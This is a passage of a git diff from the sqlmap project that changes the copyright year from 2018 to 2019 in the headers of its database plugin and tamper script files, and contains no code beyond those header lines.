(http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 611d9b6607b..ec6470aadf3 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index a4c89146e4f..8ec1c8466ea 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index 43ee7b166aa..20d74b76516 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index 36f69ef3227..3c7e37e78e0 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 97263bc7194..872fc37db56 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index 59629a3ca52..51fc0884257 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index 5fda220b8ba..c88b22d045d 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index e83c65ed2ea..9b8f1e7fdd4 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 73a17bd9f48..ab518e6c947 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index c23593f7b66..ff04024307f 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 599b2ccf448..fa390b361e3 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 12a0b7ccad2..e126e65fc3c 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 595e8f9a56f..87a4e9444e8 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 0b6190ae473..c8b40728e41 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 8ae9ecfca78..257b2deec43 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 0eae42a9bbd..b593e629c1c 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index e61d5486c91..51c0fff0e86 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/search.py b/plugins/generic/search.py index e316c1ebc62..b9a5aaddcae 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 0d20b3461d2..9ef65a54b17 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index cf721cdae29..a6d298e372e 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/plugins/generic/users.py b/plugins/generic/users.py
index cbb2fa7917d..538b2b10a95 100644
--- a/plugins/generic/users.py
+++ b/plugins/generic/users.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/sqlmap.py b/sqlmap.py
index 9d9272eabd7..b13d8c12e22 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/sqlmapapi.py b/sqlmapapi.py
index 14132bbdf6c..6804f7cf652 100755
--- a/sqlmapapi.py
+++ b/sqlmapapi.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/0x2char.py b/tamper/0x2char.py
index 50bbe8f51b3..26bb4fda017 100644
--- a/tamper/0x2char.py
+++ b/tamper/0x2char.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/__init__.py b/tamper/__init__.py
index 7181b22a163..c654cbef7f4 100644
--- a/tamper/__init__.py
+++ b/tamper/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py
index 231617ad64b..d5ed52de31f 100644
--- a/tamper/apostrophemask.py
+++ b/tamper/apostrophemask.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py
index 54fe9c80207..751c0096bcc 100644
--- a/tamper/apostrophenullencode.py
+++ b/tamper/apostrophenullencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index 1eaca164f1c..5d23e4d5789 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/base64encode.py b/tamper/base64encode.py
index 21ae80233fb..86eaa1c7bd5 100644
--- a/tamper/base64encode.py
+++ b/tamper/base64encode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/between.py b/tamper/between.py
index 827e30ee1b8..7ee05fb41db 100644
--- a/tamper/between.py
+++ b/tamper/between.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
index 5b17c0db66f..4b88a3985c5 100644
--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py
index b1d0f8fe2b4..512c2b3b4c6 100644
--- a/tamper/chardoubleencode.py
+++ b/tamper/chardoubleencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/charencode.py b/tamper/charencode.py
index 324c4a90d8a..bf2283b1f70 100644
--- a/tamper/charencode.py
+++ b/tamper/charencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py
index dc1a5dca3b1..8bd456fabc4 100644
--- a/tamper/charunicodeencode.py
+++ b/tamper/charunicodeencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py
index 28984164db6..790d8d6c49a 100644
--- a/tamper/charunicodeescape.py
+++ b/tamper/charunicodeescape.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py
index bf5d1325eed..7ebecbcecb4 100644
--- a/tamper/commalesslimit.py
+++ b/tamper/commalesslimit.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py
index 42b004b889d..3795868297a 100644
--- a/tamper/commalessmid.py
+++ b/tamper/commalessmid.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py
index 2d998b81991..23933c279ea 100644
--- a/tamper/commentbeforeparentheses.py
+++ b/tamper/commentbeforeparentheses.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index 4285eaab0ec..d2663bb2f79 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py
index b0a7c8977e0..bc65eff13db 100644
--- a/tamper/equaltolike.py
+++ b/tamper/equaltolike.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py
index 3ebcd466a58..db7c4c38876 100644
--- a/tamper/escapequotes.py
+++ b/tamper/escapequotes.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/greatest.py b/tamper/greatest.py
index 33e447132e6..989280cc89d 100644
--- a/tamper/greatest.py
+++ b/tamper/greatest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py
index 6c3f0bfc10e..7a40f9f4c61 100644
--- a/tamper/halfversionedmorekeywords.py
+++ b/tamper/halfversionedmorekeywords.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py
index eadf3225d16..8eed7b406b6 100644
--- a/tamper/htmlencode.py
+++ b/tamper/htmlencode.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py
index c9a8c0ee2fa..0a23ce71ac7 100644
--- a/tamper/ifnull2casewhenisnull.py
+++ b/tamper/ifnull2casewhenisnull.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py
index 9e2531941fd..060b88a03f2 100644
--- a/tamper/ifnull2ifisnull.py
+++ b/tamper/ifnull2ifisnull.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py
index 24fcc7b9b9e..7076fecaa70 100644
--- a/tamper/informationschemacomment.py
+++ b/tamper/informationschemacomment.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/least.py b/tamper/least.py
index 6dc9630584a..53a8a6aadef 100644
--- a/tamper/least.py
+++ b/tamper/least.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/lowercase.py b/tamper/lowercase.py
index 51a86e33563..101e4436a70 100644
--- a/tamper/lowercase.py
+++ b/tamper/lowercase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/luanginx.py b/tamper/luanginx.py
index bca93e16e79..edd22583670 100644
--- a/tamper/luanginx.py
+++ b/tamper/luanginx.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 7a6c6569724..0c4ee3e41d0 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index f87b8a098b9..af358f58b9a 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py
index f5b8e904b61..57cc2327208 100644
--- a/tamper/multiplespaces.py
+++ b/tamper/multiplespaces.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py
index 3e434638328..5cc28a6308a 100644
--- a/tamper/overlongutf8.py
+++ b/tamper/overlongutf8.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py
index a34b61929cb..301945f4f6f 100644
--- a/tamper/overlongutf8more.py
+++ b/tamper/overlongutf8more.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/percentage.py b/tamper/percentage.py
index 182ddc52c33..71259fd88f2 100644
--- a/tamper/percentage.py
+++ b/tamper/percentage.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py
index 113315b9b3c..acc800022a8 100644
--- a/tamper/plus2concat.py
+++ b/tamper/plus2concat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py
index bc85826f8ff..99e0a144255 100644
--- a/tamper/plus2fnconcat.py
+++ b/tamper/plus2fnconcat.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/randomcase.py b/tamper/randomcase.py
index 3a01b216ef9..2e9fb575b1a 100644
--- a/tamper/randomcase.py
+++ b/tamper/randomcase.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py
index 9890deed3db..1e9c7815afa 100644
--- a/tamper/randomcomments.py
+++ b/tamper/randomcomments.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/sp_password.py b/tamper/sp_password.py
index 540d3647a5e..0f2f813a49b 100644
--- a/tamper/sp_password.py
+++ b/tamper/sp_password.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2comment.py b/tamper/space2comment.py
index 1f570fc91a3..2f06c5b2d3c 100644
--- a/tamper/space2comment.py
+++ b/tamper/space2comment.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2dash.py b/tamper/space2dash.py
index 525e051a268..4ce7423f6c1 100644
--- a/tamper/space2dash.py
+++ b/tamper/space2dash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2hash.py b/tamper/space2hash.py
index 56d5e06e5eb..7acf8f6dcfc 100644
--- a/tamper/space2hash.py
+++ b/tamper/space2hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py
index e3644b6d956..3dd9a7f02f7 100644
--- a/tamper/space2morecomment.py
+++ b/tamper/space2morecomment.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py
index 77169fb96d9..c722553b7d1 100644
--- a/tamper/space2morehash.py
+++ b/tamper/space2morehash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py
index 8424ec1ca71..37998f6eb22 100644
--- a/tamper/space2mssqlblank.py
+++ b/tamper/space2mssqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
index 0e489c8f2ff..d139f6b0cf8 100644
--- a/tamper/space2mssqlhash.py
+++ b/tamper/space2mssqlhash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py
index 0216e2d6ed5..c28dc97dc41 100644
--- a/tamper/space2mysqlblank.py
+++ b/tamper/space2mysqlblank.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
